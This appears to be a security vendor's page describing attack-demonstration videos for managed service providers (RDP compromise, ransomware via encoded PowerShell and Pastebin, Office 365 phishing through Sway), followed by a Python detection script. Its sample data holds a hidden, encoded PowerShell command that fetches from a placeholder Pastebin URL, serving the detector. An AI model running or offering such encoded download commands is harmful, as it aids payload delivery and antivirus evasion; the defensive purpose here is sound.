About Videos 1 & 2:
Huntress originally shared the first two videos in a joint webinar featuring Huntress, Datto, ConnectWise, and ID Agent: Channel Security Experts Deep Dive: The Anatomy of an MSP Breach. We recommend downloading these videos and scripts and using them to help prospects better understand hacker techniques. Note that these videos have no audio, as they are intended for use in your own presentations and conversations with prospects.
You can view these videos with live narration from Kyle Hanslovan, Huntress Co-Founder & CEO, at the following timestamps in the webinar recording:
- RDP Compromise (12:40 - 18:40)
- Ransomware Infection (27:10 - 30:00)
As engineers, we all know multi-factor authentication and VPN access into networks are best practices. However, convincing stakeholders to invest in these technologies is easier said than done. This video was designed to show how attackers discover RDP exposed to the internet, brute force into networks, bypass security hurdles, capture user passwords, and spread into other user systems.
To a non-technical audience, ransomware incidents are confusing and raise questions as to why they can't be easily prevented. This video shows how hackers abuse multiple legitimate Windows applications (cmd.exe, start, powershell.exe) and encode commands to bypass behavior-based antivirus. It also illustrates how the attacker leveraged trusted websites like Pastebin to deliver ransomware payloads while evading domain reputation analysis.
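For the technical side of that conversation, the following added example (not part of the video or of Huntress's scripts) shows detection logic for the pattern described above: it flags a cmd.exe, start, powershell.exe chain, decodes the `-EncodedCommand` argument, and checks the decoded text for a Pastebin URL. The sample command lines, the placeholder URL and the function names are constructed for illustration.

```python
import base64
import re

# "-flag value" pairs where value looks like base64.
FLAG = re.compile(r"\s[-/](\w+)\s+([A-Za-z0-9+/]{8,}={0,2})(?=\s|$)")
PASTE_HOST = re.compile(r"(?i)https?://(?:www\.)?pastebin\.com/")

def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (or an abbreviation), else None."""
    for name, blob in FLAG.findall(cmdline):
        name = name.lower()
        # PowerShell accepts -ec and prefixes of the full name such as -e and -enc.
        if name == "ec" or "encodedcommand".startswith(name):
            try:
                # The argument is base64 over UTF-16LE text.
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:  # bad base64 or bad UTF-16
                return None
    return None

def analyze(cmdline):
    """Return the list of findings for one process command line."""
    findings = []
    lowered = cmdline.lower()
    if "cmd" in lowered and re.search(r"\bstart\b", lowered) and "powershell" in lowered:
        findings.append("cmd/start/powershell chain")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded command")
    if PASTE_HOST.search(decoded or cmdline):
        findings.append("paste-site URL")
    return findings

# Constructed sample data (not taken from the video); the URL is a placeholder.
SAMPLE_SCRIPT = "Invoke-WebRequest -Uri https://pastebin.com/raw/PLACEHOLDER"
BLOB = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLES = [
    "cmd.exe /c start /b powershell.exe -NoProfile -WindowStyle Hidden -enc " + BLOB,
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), "<-", line[:60])
```

The URL check runs on the decoded text because the paste-site address never appears in the raw command line once the command is encoded.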
Office 365 Phishing
Hackers are abusing the legitimate sway.office.com product to phish users out of their Office 365 credentials:
- Users receive an email/link telling them they have a voicemail in Microsoft Teams
- Users follow the link because the page is hosted on a legitimate Microsoft webpage (as demonstrated by the valid certificate)
- Users click the listen button and it takes them to a fake Office 365 login page to collect their email and password